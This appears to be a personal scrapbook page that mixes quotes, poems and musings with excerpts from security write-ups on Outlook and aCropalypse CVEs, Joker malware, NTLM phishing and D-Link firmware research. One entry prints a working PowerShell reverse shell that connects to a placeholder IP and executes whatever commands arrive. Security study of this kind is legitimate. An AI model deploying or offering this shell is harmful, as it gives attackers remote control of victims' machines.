so.cl

I like ‘people’ that feel the need to specify ‘my views are my own’. They are funny. Ok, not funny. Just plain stupid.

With the wind in my hair,
And the rain on my face,
I’ll harden my heart,
And quicken my pace.

Microsoft only fixed CVE-2023-23397 for remote sound URIs where the host has a ‘.’ in them. A SMB host accessible by hostname only can still be used to trigger this bug. Attackers on your LAN can still use CVE-2023-23397.

Kickass.jpg

Our folly is that we confuse knowledge with information. The efficiencies of software compel us to flatten the human dimension into a friction-less relay for information surfaces. Thought is the enemy in this system. It is slow, inefficient, irregular—it can’t be automated. Chatbots exist to eliminate slow thought, as thought stands in the way of capital at the speed of light. Weightless, mass-less, information capital, mined out of thin air. Those of us left standing after it has mutilated the economy will be reduced to midwives birthing a thoughtless world.

I simply do not care anymore. Call it indifference, call it lethargy, call it demoralization, I don’t care. I simply do not care and there is nothing anyone can say or do to make me care.

This article assumes you’ve already heard about the aCropalypse vulnerability, aka CVE-2023-21036. The bug lies in closed-source Google-proprietary code so it’s a bit hard to inspect, but after some patch-diffing I concluded that the root cause was due to this horrible bit of API ‘design’: https://issuetracker.google.com/issues/180526528.

Google was passing ‘w’ to a call to parseMode(), when they should’ve been passing ‘wt’ (the t stands for truncation). This is an easy mistake, since similar APIs (like POSIX fopen) will truncate by default when you simply pass ‘w’. Not only that, but previous Android releases had parseMode("w") truncate by default too! This change wasn’t even documented until some time after the aforementioned bug report was made.

The end result is that the image file is opened without the O_TRUNC flag, so that when the cropped image is written, the original image is not truncated. If the new image file is smaller, the end of the original is left behind.

IMHO, the takeaway here is that API footguns should be treated as security vulnerabilities. Exploiting aCropalypse: Recovering Truncated PNGs

Joker is a category of toll_fraud malware initially identified in 2017 whose main goal is to intercept OTP’s and subscribe users to premium services by performing clicks.

This family uses various techniques to perform malicious activities, however the base code remains the same. The malicious code responsible for performing subscription activities are downloaded externally by connecting to a malicious links. These payloads can be downloaded at a time or in multiple stages depending on the cloaking techniques used which may be implemented on client side or server side. These techniques help the malware developer from being detected by antivirus during execution of payload.

The subscription process will be invisible to user as it happens automatically by the malware. An OTP may or may not be required depending on the sim operator and the country the malware targets. Reverse engineering of Joker Malware

I don’t want to be caught up in society and the world, I want to be closer to God and his unspoiled creation, because the latter provides what the former only promises.

Every record has been destroyed or falsified, every book rewritten, every picture has been repainted, every statue and street building has been renamed, every date has been altered. And the process is continuing day by day and minute by minute. History has stopped. Nothing exists except an endless present in which the Party is always right. George Orwell, 1984

If you’re just an average person, there may be a lot of things worth doing in your life, but if you look at it from the outside perspective, it might look dull and mundane. The value of your life doesn’t depend on if it entertains a hypothetical observer, it should entertain yourself living it. Besides, a lot of people who do end up epic characters of some sort with ‘a lot to show for themselves’, like Hemingway or Einstein, end up buying into their own LARP and ultimately become a miserable person trapped in a character. It’s like sacrificing your well-being to your ego. And ultimately all of it turns to dust and even the greatest figures in history are barely remembered.

Better to live for living than for the story of your life. That said, it’s never too late to start making interesting choices and crafting a wild adventure for yourself. That, in itself, can be a very worthwhile way to live. I just think you shouldn’t get too hung up on it in terms of a narrative or legacy.

The apple does fall far from the tree if you’re an ant.

PowerShell one-liner to open a TCP socket on a remote server and executes the input as a command, sending the output back.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('xxx.xxx.xxx.xxx',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

And properly indented:

$client = New-Object System.Net.Sockets.TCPClient('xxx.xxx.xxx.xxx', 6666);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
	$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
	$sendback = (iex $data 2>&1 | Out-String );
	$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
	$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
	$stream.Write($sendbyte, 0, $sendbyte.Length);
	$stream.Flush()
};
$client.Close()

In this post we will discuss ‘How the attacker uses the Microsoft office for phishing attack to get the NTLM hashes from Windows.’ Since we all knew that Microsoft Office applications like Word, PowerPoint, Excel and Outlook are the most reliable resource for any organization, and an attacker takes advantage of this reliance to masquerade the user.

Here, we’ve been trying to explain what a different approach an attack uses for a phishing attack to capture Microsoft Windows NTLM hashes.

In actual fact, the attacker tried to use the UNC path injection technique to capture the Windows NTLM hashes and use phishing to achieve his goal. Abusing Microsoft Outlook 365 to Capture NTLM

In late October 2022, we became aware of CVE-2022-41140, a buffer overflow and remote code execution vulnerability in D-Link routers, which D-Link had been notified of on February 17th. Noting the months-long turnaround time, we decided this was a good chance to perform a learning and discovery exercise.

On March 13th, 2023 we became aware of CVE-2023-24762, a command injection vulnerability in D-Link DIR-867 devices. This recent CVE spurred us to share some of our internal documentation regarding a research spike into D-Link devices.

This blog aims to explain the process of gaining a foothold in firmware or a physical device for vulnerability research and achieving a debuggable interface. While existing Proof-Of-Concept code for (yet another) D-Link vulnerability CVE-2022-1262 is utilized within this document, as well as strong hints at suspect areas of code, don’t expect to find any new ready-to-fire exploits buried in the contents below. Debugging D-Link: Emulating firmware and hacking hardware

I have a beating heart, a healthy body and a mind capable of dreaming. This is all I need. No greater comfort will ever exist.